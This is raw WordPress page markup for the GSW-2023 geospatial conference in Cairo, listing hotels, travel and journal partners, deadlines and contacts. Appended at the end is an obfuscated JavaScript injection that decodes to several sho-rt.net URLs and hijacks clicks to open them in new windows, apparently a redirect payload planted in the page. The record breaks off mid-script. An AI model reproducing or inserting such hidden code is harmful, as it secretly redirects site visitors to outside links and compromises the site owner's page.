src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b